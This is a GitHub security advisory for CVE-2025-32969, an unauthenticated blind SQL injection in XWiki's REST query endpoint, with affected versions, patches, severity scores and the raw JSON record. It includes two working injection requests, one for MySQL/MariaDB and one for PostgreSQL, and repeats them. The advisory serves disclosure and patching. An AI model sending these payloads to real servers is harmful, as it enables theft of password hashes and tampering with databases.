GHSA-F69V-XRJ8-RHXF

Vulnerability from github – Published: 2025-04-23 14:42 – Updated: 2025-04-30 20:42
VLAI?
Summary
org.xwiki.platform:xwiki-platform-rest-server allows SQL injection in query endpoint of REST API
Details

Impact

It is possible for a remote unauthenticated user to escape from the HQL execution context and perform a blind SQL injection to execute arbitrary SQL statements on the database backend, including when "Prevent unregistered users from viewing pages, regardless of the page rights" and "Prevent unregistered users from editing pages, regardless of the page rights" options are enabled.

Depending on the used database backend, the attacker may be able to not only obtain confidential information such as password hashes from the database, but also execute UPDATE/INSERT/DELETE queries.

The vulnerability may be tested in a default installation of XWIki Standard Flavor, including using the official Docker containers.

An example query, which leads to SQL injection with MySQL/MariaDB backend is shown below:

time curl "http://127.0.0.1:8080/rest/wikis/xwiki/query?q=where%20doc.name=length('a')*org.apache.logging.log4j.util.Chars.SPACE%20or%201%3C%3E%271%5C%27%27%20union%20select%201,2,3,sleep(10)%20%23%27&type=hql&distinct=0"

When executed, the response from the server will come after a delay of 10 extra seconds, indicating successful execution of the injected SQL statement.

An example of a query for the PostgreSQL database backend is shown below:

curl "https://127.0.0.1:8080/rest/wikis/xwiki/query?q=where%20%24%24='%24%24=concat(%20chr(%2061%20),(chr(%2039%20))%20)%20;select%201%20--%20comment'&type=hql&distinct=0"

Both requests employ database backend dependent techniques of breaking out of HQL query context, described, for example, here: https://www.sonarsource.com/blog/exploiting-hibernate-injections.

Patches

This has been patched in 16.10.1, 16.4.6 and 15.10.16.

Workarounds

There is no known workaround, other than upgrading XWiki.

References

https://jira.xwiki.org/browse/XWIKI-22691

For more information

If you have any questions or comments about this advisory: * Open an issue in Jira XWiki.org * Email us at Security Mailing List

Attribution

Sergey Anufrienko from Kaspersky ICS-CERT vulnerability research team reported this vulnerability.

Severity ?
9.8 (Critical)
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
9.3 (Critical)
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
Show details on source website
To clipboard 

{
  "affected": [
    {
      "package": {
        "ecosystem": "Maven",
        "name": "org.xwiki.platform:xwiki-platform-rest-server"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "1.8"
            },
            {
              "fixed": "15.10.16"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Maven",
        "name": "org.xwiki.platform:xwiki-platform-rest-server"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "16.0.0-rc-1"
            },
            {
              "fixed": "16.4.6"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Maven",
        "name": "org.xwiki.platform:xwiki-platform-rest-server"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "16.5.0-rc-1"
            },
            {
              "fixed": "16.10.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-32969"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-89"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-04-23T14:42:42Z",
    "nvd_published_at": "2025-04-23T16:15:47Z",
    "severity": "CRITICAL"
  },
  "details": "### Impact\n\nIt is possible for a remote unauthenticated user to escape from the HQL execution context and perform a blind SQL injection to execute arbitrary SQL statements on the database backend, including when \"Prevent unregistered users from viewing pages, regardless of the page rights\" and \"Prevent unregistered users from editing pages, regardless of the page rights\" options are enabled.\n\nDepending on the used database backend, the attacker may be able to not only obtain confidential information such as password hashes from the database, but also execute UPDATE/INSERT/DELETE queries.\n\nThe vulnerability may be tested in a default installation of XWIki Standard Flavor, including using the official Docker containers.\n\nAn example query, which leads to SQL injection with MySQL/MariaDB backend is shown below:\n\n```\ntime curl \"http://127.0.0.1:8080/rest/wikis/xwiki/query?q=where%20doc.name=length(\u0027a\u0027)*org.apache.logging.log4j.util.Chars.SPACE%20or%201%3C%3E%271%5C%27%27%20union%20select%201,2,3,sleep(10)%20%23%27\u0026type=hql\u0026distinct=0\"\n```\n\nWhen executed, the response from the server will come after a delay of 10 extra seconds, indicating successful execution of the injected SQL statement.\n\nAn example of a query for the PostgreSQL database backend is shown below:\n\n```\ncurl \"https://127.0.0.1:8080/rest/wikis/xwiki/query?q=where%20%24%24=\u0027%24%24=concat(%20chr(%2061%20),(chr(%2039%20))%20)%20;select%201%20--%20comment\u0027\u0026type=hql\u0026distinct=0\"\n```\n\nBoth requests employ database backend dependent techniques of breaking out of HQL query context, described, for example, here: https://www.sonarsource.com/blog/exploiting-hibernate-injections.\n\n### Patches\n\nThis has been patched in 16.10.1, 16.4.6 and 15.10.16.\n\n### Workarounds\n\nThere is no known workaround, other than upgrading XWiki.\n\n### References\n\nhttps://jira.xwiki.org/browse/XWIKI-22691\n\n### For more information\n\nIf you have any questions or comments about this advisory:\n* Open an issue in [Jira XWiki.org](https://jira.xwiki.org/)\n* Email us at [Security Mailing List](mailto:security@xwiki.org)\n\n### Attribution\n\nSergey Anufrienko from Kaspersky ICS-CERT vulnerability research team reported this vulnerability.",
  "id": "GHSA-f69v-xrj8-rhxf",
  "modified": "2025-04-30T20:42:39Z",
  "published": "2025-04-23T14:42:42Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-f69v-xrj8-rhxf"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-32969"
    },
    {
      "type": "WEB",
      "url": "https://github.com/xwiki/xwiki-platform/commit/5c11a874bd24a581f534d283186e209bbccd8113"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/xwiki/xwiki-platform"
    },
    {
      "type": "WEB",
      "url": "https://jira.xwiki.org/browse/XWIKI-22691"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "org.xwiki.platform:xwiki-platform-rest-server allows SQL injection in query endpoint of REST API"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.